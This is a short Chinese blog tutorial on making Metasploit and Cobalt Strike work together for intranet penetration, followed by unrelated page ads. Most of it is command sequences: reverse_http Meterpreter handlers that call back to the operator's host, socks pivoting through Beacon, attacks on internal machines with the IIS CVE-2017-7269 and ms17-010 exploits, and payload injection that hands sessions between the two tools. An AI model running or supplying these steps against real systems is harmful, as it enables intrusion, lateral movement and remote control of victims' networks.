MSF&&CS联动
内网穿透#
因为需要派生shell当然需要外网的服务,这里就直接使用frp就行
利用CS为MSF服务#
利用CS的Beacon为MSF派生Shell#
在msf中配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost ip
set lport port
set ExitOnSession False
run -j
在cs中建立一个外部监听器 Foreign HTTP
然后 spawn 监听器名称就OK
利用CS提供代理转发#
利用Beacon建立 socks 代理:
在Beancon输入socks 监听端口或者图形化
在 view -> Proxy Pivots 中可以看到建立的转发器,点击Tunnel即可获得MSF的转发命令:
复制到msf界面就行。
然后这里使用cve_2017_7269来打内网的机器,因为不出网所以直接正向连接
setg Proxies socks4:xxx:8986
use exploit/windows/iis/cve-2017-7269
set payload windows/meterpreter/bind_tcp
run
利用MSF为CS服务#
获取一个Shell对话#
因为并不是所有的exp都可以反弹meterpreter对话。
在cs中点击Attacks -> Web Drive-by -> Scripted Web Delivery或者点如图所示
填写好信息之后点击OK就会弹出对话框
然后就可以看到上线Python如果有环境也是一样的。
获取一个meterpreter会话#
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST CS_IP
set LPORT CS_PORT
set session 会话几
set disablepayloadhandler true //设置msf不监听不然没有会话建立 CS也收不到会话
因为没设置PID就会则会创建一个32位的notepad.exe进程。
直接反弹回cs#
在MSF漏洞利用时直接请求并加载CS的载荷和上面基本一样,这里用ms17-010测试
set payload windows/meterpreter/reverse_http
set lport cs_port
set lhost cs_host
set disablepayloadhandler true //不监听
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具